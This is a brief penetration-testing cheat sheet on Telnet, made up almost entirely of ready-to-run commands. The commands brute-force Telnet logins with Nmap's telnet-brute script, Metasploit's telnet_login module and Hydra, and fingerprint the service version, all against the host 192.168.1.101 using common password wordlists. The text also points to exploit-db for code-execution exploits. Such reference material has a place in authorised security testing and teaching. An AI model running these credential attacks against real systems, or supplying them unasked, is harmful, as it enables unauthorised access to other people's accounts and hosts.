Telnet protocol considered insecure because it doesn’t encrypt data. The protocol is old and is affected by various Code-Execution vulnerabilities, might be worth checking exploit-db.com for that.
Brute force Telnet with Nmap:
nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s 192.168.1.101
Brute force with Metasploit:
use auxiliary/scanner/telnet/telnet_login msf auxiliary(telnet_login) > set BLANK_PASSWORDS false BLANK_PASSWORDS => false msf auxiliary(telnet_login) > set PASS_FILE passwords.txt PASS_FILE => passwords.txt msf auxiliary(telnet_login) > set RHOSTS 192.168.1.101 RHOSTS => 192.168.1.101 msf auxiliary(telnet_login) > set THREADS 254 THREADS => 254 msf auxiliary(telnet_login) > set USER_FILE users.txt USER_FILE => users.txt msf auxiliary(telnet_login) > set VERBOSE false VERBOSE => false msf auxiliary(telnet_login) > run
Brute force with Hydra:
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet
Detect Telnet version:
use auxiliary/scanner/telnet/telnet_version msf auxiliary(telnet_version) > set RHOSTS 192.168.1.101 RHOSTS => 192.168.1.101 msf auxiliary(telnet_version) > set THREADS 254 THREADS => 254 msf auxiliary(telnet_version) > run